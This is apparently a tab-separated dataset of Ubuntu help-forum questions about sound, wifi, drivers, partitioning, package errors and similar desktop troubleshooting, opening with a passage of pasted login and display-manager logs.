lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 jun 21 13:36:42 melissa-thinkpad-t430 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` melissa '' jun 21 13:36:43 melissa-thinkpad-t430 dbus [ 827 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.32 '' ( uid=104 pid=1715 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.16 '' ( uid=0 pid=1233 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) jun 21 13:36:47 melissa-thinkpad-t430 dbus [ 827 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.40 '' ( uid=104 pid=1831 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.16 '' ( uid=0 pid=1233 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) jun 21 13:36:50 melissa-thinkpad-t430 lightdm : pam_unix ( lightdm : session ) : session closed for user lightdm jun 21 13:36:50 melissa-thinkpad-t430 lightdm : pam_unix ( lightdm : session ) : session opened for user melissa by ( uid=0 ) jun 21 13:36:50 melissa-thinkpad-t430 lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 jun 21 13:36:50 melissa-thinkpad-t430 lightdm : pam_unix ( lightdm : session ) : session closed for user melissa jun 21 13:36:51 melissa-thinkpad-t430 lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) jun 21 13:36:51 melissa-thinkpad-t430 lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 jun 21 13:36:51 melissa-thinkpad-t430 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` melissa '' jun 21 13:36:51 melissa-thinkpad-t430 dbus [ 827 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.47 '' ( uid=104 pid=2010 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.16 '' ( uid=0 pid=1233 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) jun 21 13:37:01 melissa-thinkpad-t430 login [ 1034 ] : pam_unix ( login : session ) : session opened for user melissa by login ( uid=0 ) jun 21 13:38:30 melissa-thinkpad-t430 sudo : melissa : tty=tty2 ; pwd=/home/melissa ; user=root ; command=/usr/bin/apt-get install pastebinit jun 21 13:38:30 melissa-thinkpad-t430 sudo : pam_unix ( sudo : session ) : session opened for user root by melissa ( uid=1000 ) jun 21 13:38:32 melissa-thinkpad-t430 sudo : pam_unix ( sudo : session ) : session closed for user root jun 21 13:38:51 melissa-thinkpad-t430 sudo : melissa : tty=tty2 ; pwd=/home/melissa ; user=root ; command=/usr/bin/apt-get -f install pastebinit jun 21 13:38:51 melissa-thinkpad-t430 sudo : pam_unix ( sudo : session ) : session opened for user root by melissa ( uid=1000 ) jun 21 13:38:52 melissa-thinkpad-t430 sudo : pam_unix ( sudo : session ) : session closed for user root here is lightdm.log : [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.3 , uid=0 pid=1085 [ +0.00s ] debug : loading configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for greeter [ +0.00s ] debug : starting local x display [ +0.00s ] debug : x server :0 will replace plymouth [ +0.02s ] debug : using vt 7 [ +0.02s ] debug : activating vt 7 [ +0.02s ] debug : logging to /var/log/lightdm/x-0.log [ +0.03s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.03s ] debug : launching x server [ +0.03s ] debug : launching process 1094 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none [ +0.03s ] debug : waiting for ready signal from x server :0 [ +0.03s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.03s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +3.55s ] debug : got signal 10 from process 1094 [ +3.55s ] debug : got signal from x server :0 [ +3.55s ] debug : stopping plymouth , x server is ready [ +3.57s ] debug : connecting to xserver :0 [ +3.58s ] debug : starting greeter [ +3.58s ] debug : started session 1182 with service 'lightdm ' , username 'lightdm' [ +5.24s ] debug : session 1182 authentication complete with return value 0 : success [ +5.24s ] debug : greeter authorized [ +5.24s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +5.30s ] debug : session 1182 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +8.79s ] debug : greeter connected version=1.2.3 [ +8.79s ] debug : greeter connected , display is ready [ +8.79s ] debug : new display ready , switching to it [ +8.79s ] debug : activating vt 7 [ +13.26s ] debug : greeter start authentication for melissa [ +13.26s ] debug : started session 1708 with service 'lightdm ' , username 'melissa' [ +13.28s ] debug : session 1708 got 1 message ( s ) from pam [ +13.28s ] debug : prompt greeter with 1 message ( s ) [ +20.58s ] debug : continue authentication [ +20.59s ] debug : session 1708 authentication complete with return value 0 : success [ +20.59s ] debug : authenticate result for user melissa : success [ +20.59s ] debug : user melissa authorized [ +20.59s ] debug : greeter requests session ubuntu-2d [ +20.59s ] debug : using session ubuntu-2d [ +20.59s ] debug : stopping greeter [ +20.59s ] debug : session 1182 : sending sigterm [ +20.70s ] debug : greeter closed communication channel [ +20.70s ] debug : session 1182 exited with return value 0 [ +20.70s ] debug : greeter quit [ +20.71s ] debug : dropping privileges to uid 1000 [ +20.71s ] debug : restoring privileges [ +20.71s ] debug : dropping privileges to uid 1000 [ +20.71s ] debug : writing /home/melissa/.dmrc [ +20.75s ] debug : restoring privileges [ +20.82s ] debug : starting session ubuntu-2d as user melissa [ +20.82s ] debug : session 1708 running command /usr/sbin/lightdm-session gnome-session -- session=ubuntu-2d [ +20.85s ] debug : registering session with bus path /org/freedesktop/displaymanager/session0 [ +21.07s ] debug : session 1708 exited with return value 0 [ +21.07s ] debug : user session quit [ +21.07s ] debug : stopping display [ +21.07s ] debug : sending signal 15 to process 1094 [ +21.22s ] debug : process 1094 exited with return value 0 [ +21.22s ] debug : x server stopped [ +21.22s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +21.22s ] debug : releasing vt 7 [ +21.22s ] debug : display server stopped [ +21.22s ] debug : display stopped [ +21.22s ] debug : active display stopped , switching to greeter [ +21.22s ] debug : switching to greeter [ +21.22s ] debug : starting new display for greeter [ +21.22s ] debug : starting local x display [ +21.22s ] debug : using vt 7 [ +21.22s ] debug : logging to /var/log/lightdm/x-0.log [ +21.22s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +21.22s ] debug : launching x server [ +21.22s ] debug : launching process 1919 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +21.22s ] debug : waiting for ready signal from x server :0 [ +21.29s ] debug : got signal 10 from process 1919 [ +21.29s ] debug : got signal from x server :0 [ +21.29s ] debug : connecting to xserver :0 [ +21.29s ] debug : starting greeter [ +21.29s ] debug : started session 1924 with service 'lightdm ' , username 'lightdm' [ +21.30s ] debug : session 1924 authentication complete with return value 0 : success [ +21.30s ] debug : greeter authorized [ +21.30s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +21.30s ] debug : session 1924 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +21.39s ] debug : greeter connected version=1.2.3 [ +21.39s ] debug : greeter connected , display is ready [ +21.39s ] debug : new display ready , switching to it [ +21.39s ] debug : activating vt 7 [ +21.39s ] debug : stopping greeter display being switched from [ +21.63s ] debug : greeter start authentication for melissa [ +21.63s ] debug : started session 1998 with service 'lightdm ' , username 'melissa' [ +21.63s ] debug : session 1998 got 1 message ( s ) from pam [ +21.63s ] debug : prompt greeter with 1 message ( s )
486456	not hearing any sound 14.04 , mulitple soundcards detected	i installed ubuntu 14.04 and i chose not to install updates ( i wanted to do it on my own ) , i 'm also using a 7.1 soundcard ( `` kรถnig 7.1 soundcard '' ) . i only had sound coming from the right side ( i think i had this problem under arch and i think it was pulseaudio ) , i then installed updates and sound was n't working . my guess is that the first problem occurred because surround sounds was somehow enabled . so does anyone have an idea how i can the audio to work again ?
486459	network do not work properly	there are problems with a network on my pc with xubuntu . when using firefox there is connection , then after some time there is no connection ( i do n't know if that depends on time or on internet sites ) . to get it back i need to disconnect and connect again . any idea what 's wrong ? thanks a lot . here is the output : monika @ soliton : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00 : e0:81 : d7:53:39 inet addr:138.251.31.55 bcast:138.251.31.255 mask:255.255.255.0 inet6 addr : fe80 : :2e0:81ff : fed7:5339/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1197050 errors:0 dropped:2942 overruns:0 frame:0 tx packets:57298 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:202955873 ( 202.9 mb ) tx bytes:8038505 ( 8.0 mb ) interrupt:16 memory : fbae0000-fbb00000 eth1 link encap : ethernet hwaddr 00 : e0:81 : d7:53:3a up broadcast multicast mtu:1500 metric:1 rx packets:760 errors:0 dropped:0 overruns:0 frame:0 tx packets:31 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:107171 ( 107.1 kb ) tx bytes:7786 ( 7.7 kb ) interrupt:17 memory : fb9e0000-fba00000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1040436 errors:0 dropped:0 overruns:0 frame:0 tx packets:1040436 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:720082495 ( 720.0 mb ) tx bytes:720082495 ( 720.0 mb )
486460	qualcomm atheros ar9485 does not work ubuntu 14.04	i have tried in vain to get my wifi working again . i have a qualcomm atheros ar9485 , i am running ubuntu 14.04 and my kernel version os 3.14 . i can work around it but i do n't want to do it every time i restart my laptop . any suggestions ?
486461	how to create folder shortcut in ubuntu 14.04 ?	i have a folder in my dropbox and i want to add a shortcut of that folder on my desktop . i guess this should be extremely easy as in windows os : ) however , i have no idea how to do it in ubuntu 14.04 . is there anything i can do to create a simple folder shortcut on my desktop ?
486463	ubuntu server lvm mapper problem at boot when plugged a second hard drive	i installed ubuntu 14.04lts server version . recently , i just successfully installed a second hard drive to use as glusterfs . but after a reboot , the server stop at loading stage with the error message : alert ! /dev/mapper/qtdev00 -- vg-root does not exist . dropping to a shell ! ( initramfs ) i unplugged the second hard drive and it boots fine . seems to me like lvm problem since another machine without lvm works perfect fine ! thanks for your help
486464	flashback gnome does n't work on 14.04	i have upgraded to ubuntu 14.04 a while back and decided to try out the gnome flashback option . i used the software center to get it installed and after logging out i have the two extra options ( metacity and compiz ) . however when i log in using these i do n't get anything on my desktop except for the background picture . i can use the right click to get to system settings ( via all settings after clicking 'change background ' ) , but i do not see an option to manually start the panel or anything else . also , i can not logout , shut down or do anything else than use a hard power down , restart the computer and then login to unity which still works perfectly fine . anyone have any clues why this might be happening ?
486466	can not use apt-get	root @ mc : /home/sdtd # apt-get install rpm reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.38.46 ) but 3.2.0.64.76 is to be installed depends : linux-headers-server ( = 3.2.0.38.46 ) but 3.2.0.64.76 is to be installed rpm : depends : librpm2 ( > = 4.9.0 ) but it is not going to be installed depends : librpmbuild2 ( > = 4.9.0 ) but it is not going to be installed depends : librpmio2 ( > = 4.9.0 ) but it is not going to be installed depends : librpmsign0 ( > = 4.9.0 ) but it is not going to be installed depends : rpm2cpio depends : rpm-common ( = 4.9.1.1-1ubuntu0.2 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ mc : /home/sdtd # after apt-get -f install : root @ mc : /home/sdtd # sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-31-generic libicu48 linux-headers-3.2.0-30 linux-headers-3.2.0-31 linux-headers-3.2.0-32 linux-headers-3.2.0-33 linux-headers-3.2.0-34 linux-headers-3.2.0-35 linux-headers-3.2.0-36 linux-headers-3.2.0-34-generic linux-headers-3.2.0-32-generic libdumbnet1 linux-headers-3.2.0-35-generic linux-headers-3.2.0-30-generic linux-headers-3.2.0-33-generic linux-headers-3.2.0-36-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 155 not upgraded . 1 not fully installed or removed . need to get 0 b/1,734 b of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.38.46 ) ; however : version of linux-image-server on system is 3.2.0.64.76. linux-server depends on linux-headers-server ( = 3.2.0.38.46 ) ; however : version of linux-headers-server on system is 3.2.0.64.76. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
486474	system loses static ip address	one of my headless systems is assigned a static ip address through /etc/network/interfaces on a wired ethernet . it is connected to a router which is also a dhcp server . after a couple of days , the static address is dropped and replaced by a dhcp address . why would that be ? if i do a sudo ifdown eth0 & & sudo ifup eth0 or sudo service networking restart or a reboot , the system takes on its static address again , but then a couple of days later , the ip address changes to a dynamic one . there is no other system on the network with ( accidentally ) the same static address . networkmanager is not running on the system . i have set up the system to email me as soon as the address changes , but the times at which that occurs seem completely random . dhcp lease time is 24h but that does n't seem to correlate , and anyway that should n't matter for a static address . my /etc/network/interfaces is this : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.124.104 gateway 192.168.124.253 netmask 255.255.255.0 it 's a bit of a puzzle.what would cause a system to give up its static address and request a dhcp address instead ? what to look for , in which log file ?
486476	is there some way to make windows owned by root ( sudo ) look different from normal user ones ?	i run sudo gedit but it looks exactly like another gedit i have open with normal user ... any way to make it look diferent ? but i dont mean tweaking each application preferences like background color of text ; i mean the window decorations ; i am unable to find a good way to work around that . i dont want just the background because i like it dark , and at least on gedit there is not much options ; anyway other applications may not have such option . ps . : i actually run sudo -i gedit because without -i it overwrites and messes my normal user recent files history ... folowing @ jobin gksudo tip , i got this result with kate : the image below the other is from gksudo kate , the above one is normal user ; so basically , the window decoration of title bar did not change , both remained `` radiance '' , but the buttons and the background are completely different themes ! unfortunately it seems kate has specific settings for at least the background color : ( , i am looking for a generic solution .
486477	firefox `` email image ... ''	ubuntu lts 12.04.4 firefox 30 using firefox , cursor over an image , right click , select `` email image ... '' , brings me to my configured email , but the image url is not correct . it appears to have various other characters imbedded in it - something that looks like this : http % 3a % 2f % 2fupload.wikimedia.org % 2fwikipedia % 2fcommons % 2f7 % 2f79 % 2ftesla_circa_1890.jpeg & subject rather than this : http : //upload.wikimedia.org/wikipedia/commons/7/79/tesla_circa_1890.jpeg i have been able to determine where/why this is happening . the `` email image ... '' worked correctly several weeks ago . nothing has changed in between this working and not working . by way of trying to resolve this , i installed all updates , de-installed firefox , cleared $ home/.mozilla , re-installed firefox . no joy . thanks jim
486486	canon printer ip 4850\ does n't print in ubuntu 14.04	since i 've upgraded ubuntu to 14.04 my canon printer does n't work anymore . i already have re-installed the driver , have followed all kind of information how to solve the problem but nothing is working . my last action was to re-install ubuntu 14.04 again but did not solve the problem . if i want to print some files i have to switch to windows 7 , but i think that this is not the most efficient way .
486488	bad wifi connection intel corporation centrino advanced-n 6235	my dell xps 13 have a terrible connection and i have a limited range of where it will connect to my router ( 15-20ft ) . i have tried to turn off the power manager but it does n't seem to make too much of a difference . sudo modprobe iwlwifi 11n_disable=1 i also tried to disable hardware . i did n't notice too much of a difference . but i could have also done it incorrectly . ( how do i know if i did this right/wrong ? ) lshw -c network *-network description : wireless interface product : centrino advanced-n 6235 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 24 serial : c8 : f7:33 : ca:53:2d width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-29-generic firmware=18.168.6.1 ip=10.0.0.22 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : d0400000-d0401fff sudo iwconfig lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' home-32e2 '' mode : managed frequency:2.462 ghz access point : 0c : f8:93 : a9:32 : e0 bit rate=27 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=47/70 signal level=-63 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:244 invalid misc:143699 missed beacon:0
486489	how do i make a chroot clone of my [ current setup ] like after a fresh install	where i am ... i know that i debootstrap trusty /chroot-dir and then i ... mount -- bind /dev /chroot-dir/dev & & mount -- bind /proc /chroot-dir/proc and then cat /etc/apt/sources.list > /chroot-dir/etc/apt/sources.list after that : connection issues . hostname ? dunno ...
486490	how do i backup unity tweak settings ?	is a backup of the home folder enough ? all that i could find is ~/.config/unity-tweak-tool which only contains debug.log . however , i 'm aware that the actual settings that this tool configures are actually elsewhere ; are all those config files stored in the home folder aswell ?
486492	wifi driver randomly shuts off	i installed ubuntu 14.04 today . so i am very new and inexperienced with it . i had this issue when i had windows 8.1 installed . randomly the wifi driver shuts off and to fix it i have to disable the driver and re-enable it . on windows it was super easy , it gave me a nice gui to do it however i 'm not seeing something similar for ubuntu . i feel like i 've exhausted resources as far as googling/trial and error . so if anyone knows a command to run that will restart the driver i would be much appreciative . bonus points if you know how to prevent the issue from happening at all ; ) some basic info to help you out , i have an asus q501l laptop . the wireless card is : 03:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b1 ] ( rev 6b ) thanks so much in advance guys .
486496	oversized folder	is it possible to reverse the effect of bleach bit ? ? last week i installed bleach bit and ran it for the first time on my newly installed ubuntu system . i noticed that i was doing its thing and was fulling up my computers hard drive and slowing it down . so i left it and went to sleep . i left it there over night . when i checked it in the morning the bleach bit window was dark like a not responding window . so i did n't do anything . i left it on and running and went to work . when i got back from work , it was still dark and not responding . and i had 198 gds free out of a 640 hard drive . do n't have a lot of files on the system . only about 90 gd tops would have bee occupied . i powered off and turn it on again . not i am just left with the 198 gbs . what i have tried : running bleach bit again but always freezes and never completes . uninstall and reinstall bleach bit and ran again . i only ran bleach bit on it because i figured that it would fix the issue but it did n't . instead what i have is over sized folders and i can not see the files that are occupying this space . can someone help me to fix this problem ? ?
486499	asus chromebox displayport monitor not detected	i have installed ubuntu 14.04 as a dual boot os on my asus chromebox and i 'm a linux newbie . anyway , everything seems to be working fine except for the displayport monitor not working . the chromebox has two outputs - displayport and hdmi . i have a hdmi - > dvi cable as well as a displayport - > dvi adapter hooked to a dvi cable . both monitors work fine in chromeos mode , but only the hdmi port works in ubuntu mode . i went to the display settings in ubuntu but only the hdmi-connected monitor is showing up . i have swapped the cables to hook into each different monitor but only the hdmi one works no matter the setup . also , if i only hook up the displayport and boot into ubuntu , it does show a little bit of text for a second before it goes into graphical mode and then the monitor loses signal . so i 'm guessing it 's a missing driver or something . is there some way to see if i have a missing driver or something that would be needed to detect this second monitor ? thanks
486505	how to execute a command several times in the terminal with/without a few minor changes ?	suppose that i want to execute the command ls ten times ( despite of it being purposeless since it will only display the directory contents 10 times ) , is there an equivalent to writing the following : for ( i = 0 , i < 10 , i++ ) { ls } now , suppose that i want to execute a java program ten times , each time with a different input file . is there an equivalent to writing the following : filelist = [ input1 , input2 , ... .. , input10 ] for ( i = 0 , i < 10 , i++ ) { java myprogram filelist [ i ] } i am guessing that there is some sort of language where i could write this kind of scripts . i tried looking online but my knowledge is basic and i could not find anything that i understood .
486506	how do i enable java on chrome	i have java latest version installed and working fine for firefox on ubuntu ( 12.04 ) but i am having problems on chrome . how do i enable java in chrome . br , tariq
486509	5th partition without format	i have a 500gb hdd with 4 primary partitions : sda1 : ubuntu , sda2 : swap ( 2gb ) , sda3 : win8.1 , sda4 : logical ( sda5 & sda6 ) storage . while creating all these partitions , i inadvertently left 7gb unallocated ( adjacent to sda3 ) now i want to create a backup partition ( probably bootable , do n't know ) to use with the dell backup utility but ca n't since i already have 4 primary partitions : / i thought about removing the swap partition as i have 4gb of ram , but i read thousands of threads and i 'm still lost . is there a way that i can create such a partition without loosing any data ? btw , if someone could tell me how , it would be very kind .
486513	jack turns off other sound	i have a midi keyboard connected to qsynth through jack , which works fine . but when i try to play other sound ( from chrome , vlc , etc . ) it is completely silent . how do i fix this ?
486514	fn media-keys issues on asus q500a	i 'm dealing with a serious matters since i installed my ubuntu 14.04 lts . ctrl key seem pressed at the startup and keys b , h , c are pressed when i use : fn+f11 ( to decrease volume ) fn+f12 ( to increase volume ) fn+f3 , f4 ( to decrease and increase the brightness of the my back-light keyboard ) i 'm using an asus q500a bhit705 .
486516	wierd wine install	while searching for a version of wine that correctly runs the game i want to play , ( aoe 2 ) i found this : http : //www.darkgamex.ch/wine/ it is a website linked to the download of two custom wine variants that are designed to work with aoe 2. the problem is that i do not know how to correctly install it .
486517	recover encfs files	last month i encripted a file i reinstalled the os but i cant recover the encripted file that i encripted with encfs in the last installation how can i do thanks p.s . same passord .
486521	file permission in www/html directory for security	how can i give permission to directories and files in www/html for security . this files have an .js , .php , .sh extensions.they execute in www/html by apache 's user ( mine is www-data ) . when i give 777 permission to this file and directories , the others which are the same network can see the file content . this is weak security.i want to make strong security . when i give 644 the some of files ca n't execute.this permission should make strong security and at the same time it is enough to execute file . which permission must be given to directories and files for this state ?
486522	gscan2pdf does not let me choose 150 resolution	i got a workforce-3520 printer scanner with adf scan . drivers seem to work and i can scan my documents with gscan2pdf but scanning is pretty slow @ 300 resolution . unfortunately i can not choose 150dpi resolution . only 75 and 300 and above . when i choose 300 scan resolution and 15 x y resolution i get a `` error during device i/o '' after the first scanned file . how can i persuade gscan2pdf to let me choose 150 dpi resolution ?
486531	volume too low after connecting pulseaudio to jack	i followed the tutorial mentioned here but after the sound is much quieter even at 100 % . i have loooked at the pulseaudio volume controls and alsamixer and they are all also at 100 .
486533	ca n't suspend to ram any more after upgrade to 14.04	i upgraded to 14.04 and now my laptop ca n't `` sleep '' anymore i.e . suspend to ram does n't work . how can i figure out what 's wrong and fix this ? edit 1 my hardware is a asus zenbook ux32a edit 2 well , i do n't have a script /etc/acpi/sleep.sh on my machine . i installed smartly and this is what i get : $ sudo hibernate-ram hibernate-ram : warning : tuxonice binary signature file not found . s2ram : unknown machine , see s2ram ( 8 ) and the ususpendramforce option hibernate-ram : aborting . $
486534	list hidden files without using - ( * |	is it possible to list hidden files without using the characters mentioned above ? this means not using any options or the * wildcard as well as some other characters ( e.g this is not allowed `` ls -a '' , `` ls -d . ! ( | . ) '' , `` echo . * '' etc . ) .
486542	upload all release versions of tools with juju 's local ( lxc ) provider ?	i 'm using the local lxc provider on trusty , with the default-series : trusty option . whenever i try to deploy a non-trusty charm , it never finishes ( stays in pending state ) , and the log says machine-0 : 2014-06-22 00:28:59 error juju runner.go:220 worker : exited `` environ-provisioner '' : failed to process updated machines : can not start machine 9 : no matching tools available how can i upload tools for all versions so i do n't just have to use charms from the version i specified with default-series ?
486543	14.04 lts - nvidia 331 dual monitors not working any more after updating	when using the x server nouvea display drivers my dual monitors works perfectly fine . however it sometimes crashes so i decided to change the display drivers to the the latest nvidia 331.38 driver for the gtx 660 i have on my computer . the monitors i have is a samsung which is plugged into the gpu vga socket . an acer which is plugged into the mobo vga socket . after the upgrade to the 331.38 nvidia drivers i have no more crashes however only the samsung monitor which is plugged into the gpu is working . is there any way i can fix this ? also forgot to mention that when i boot up ubuntu the acer second monitor connected to the mobo shows the loading screen for ubuntu but does not boot up to the desktop , just sticks at the loading screen .
486548	how do i properly restart chrome ?	i 've been doing some webgl development , and of course crashing chrome occasionally along the way . when this happens , webgl in chrome wo n't work until i restart my pc , which makes me think that even though i close every chrome window i can see , it 's still running somehow . in windows i am used to using task manager to ensure an application has actually stopped running , what 's the ubuntu equivalent ? thanks
486549	how to install vmware view client ?	i have tried installing it through the software-center ; installed , removed and reinstalled and it is still giving me problems , it simply crashes when i open it . so i tried synaptic , which looks good , so far . however , when i follow this documentation , it tells me that vmware-view-open-client is old and i want vmware-view-client . i do not see it when i search for it though . i do see the open one . all my google searches have not given me exactly what i am looking for . i feel like i 'm close , if anyone can point me in the right direction , that would be great .
486554	ubuntu 14.04 - 32 bit vs 64 bit	if i install ubuntu 14.04 32 bit version on a machine with ram exceeding 4 gb , will it not use more than 4 gb of ram ?
486556	no partitions found while installing , dual-boot win8/ubuntu 14.04	solved : see op 's answer below i am trying to install ubuntu alongside windows 8 . i have a laptop that has been through various dual-boot configs . at one point , i was only running linux mint . eventually , i wanted windows 8 back to run visual studio . i decided to complete remove everything , and reinstall win8 . now , i am wanting to install ubuntu alongside windows to learn a thing or two about hadoop . i have disabled secure and fast boot . actually , secure boot is n't even an option - i happened to install windows 8 from a usb created by windows 7 live usb creator tool . silly mistake on my part , it does n't create usbs that are uefi capable . legacy/csm works just fine though . do note , however , that if you are doing the same - you must delete the efi directory from the liveusb you are installing ubuntu from . otherwise , you will end up with windows for csm boot mode and ubuntu for uefi boot mode . either way , upon install - no other os is found . not to worry , i 've been here before and created partitions . however , my next screen disturbing : basically , the partition that i set aside for ubuntu is n't found and all it recognizes is that there 's a single hard drive waiting to run amok on . help ? output of sudo parted -l warning : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? model : generic flash disk ( scsi ) disk /dev/sdb : 4299mb sector size ( logical/physical ) : 512b/512b partition table : msdos number | start | end | size | type | file system | flags 1 | 1049kb | 4299mb | 4298mb | primary | fat32 | boot , lba //end output is the same for both yes and no . note there was 300gb/750gb partitioned , using windows disk management , which i plan to put ubuntu on . the command sudo parted -l is displaying info on the windows partition .
486558	getting netflix to work with pipelight	i installed and enabled silverlight with pipelight and changed my user agent to windows firefox but netflix tells me i need to install silverlight . additionally , the bubble demo for pipelight did n't work ( it just gave me a button to instal silverlight ) . i am using the chrome browser ( not chromium ) . here is the output of pipelight-plugin -- system-check > > 32 bit < < wine-1.7.20 patches : 1b7ac850-5040-4d9e-8fde-9c483c3baf33:1 : : sebastian lackner : : add commandline option -- patches to show the patch list . 9e9a58e1-b226-4d4d-943b-be9a4c1dc525:1 : : michael müller : : add commandline option -- check-libs to test if shared libraries are installed . 8a366b6d-8ad6-4581-8aa9-66a03590a57b:2 : : erich e. hoover : : implement sio_address_list_change . 92938b89-506b-430a-ba50-32de8b286e56:6 : : erich e. hoover : : store and return security attributes with extended file attributes . 5d6bb7b5-ec88-4ed3-907d-9ad2173a2f88:1 : : sebastian lackner : : enable/disable windows when they are ( un ) mapped by foreign applications . 94186fff-6dbf-44d0-8eb1-2463d1608a0f:1 : : sebastian lackner : : update gl_drawable for embedded windows . cbe240e8-2c58-430a-b61c-7fbb9d0e1e11:1 : : sebastian lackner : : change return value of stub setnamedpipehandlestate to true . 00273da7-72f8-4025-9e96-0c2bc95dacdb:3 : : maarten lankhorst : : winepulse patches extracted from https : //launchpad.net/~ubuntu-wine/+archive/ppa/+files/wine1.7_1.7.19-0ubuntu2~trusty2.debian.tar.gz . fbea4ef6-85ac-4524-b32d-fc9882b73e5a:1 : : erich e. hoover : : implement getvolumepathname . 4cd13e94-7f2d-11e3-b5eb-0090f5c75ad5:1 : : erich e. hoover : : support for junction points/reparse points . 5fb1f5c8-7f17-11e3-9b62-0090f5c75ad5:1 : : erich e. hoover : : implement transmitfile . 3d7c4774-9e7f-11e3-9cfc-0090f5c75ad5:1 : : erich e. hoover : : implement missing fonts expected by silverlight . e7581ed7-12b3-4ed3-835b-5a62afbf9c85:4 : : sebastian lackner : : use lockfree implementation for get_cached_fd . 3405aa34-f341-11e3-83ce-0090f5c75ad5:1 : : erich e. hoover : : add default security descriptor ownership and dacls for processes . d85bf5ee-3578-4edd-be3e-35cacd53e5cc:1 : : sebastian lackner : : raise dbg_printexception_c exception in outputdebugstringa . 0b21d7ac-0387-4493-aa38-fbafe3e749f5:2 : : michael müller : : decrease minimum settimer interval to 5 ms. 2394843e-2bc4-4fa4-8368-1ef32093b89e:1 : : michael müller : : allow changing strict draw ordering through an exported function . 255473fa-4e0a-4f51-952b-4deecc1a2181:1 : : michael müller : : indicate direct rendering through opengl extension . 59bd38b7-bbdc-4cfd-9ccd-1c72c4ed84c0:1 : : sebastian lackner : : implement x11drv_flush_gdi_display extescape command . 325645ba-d39d-4de4-9c94-3fe694eedaab:1 : : sebastian lackner : : kernel32 : silence repeated comparestringex fixme . 46fb5f97-34cb-4b6b-ae10-7511db90ba1d:1 : : sebastian lackner : : avoid race-condition when unloading modules while hook is still active . acff3012-0f75-4710-9941-08b5ce4c61f3:2 : : erich e. hoover : : wined3d : silence repeated resource_check_usage fixme . 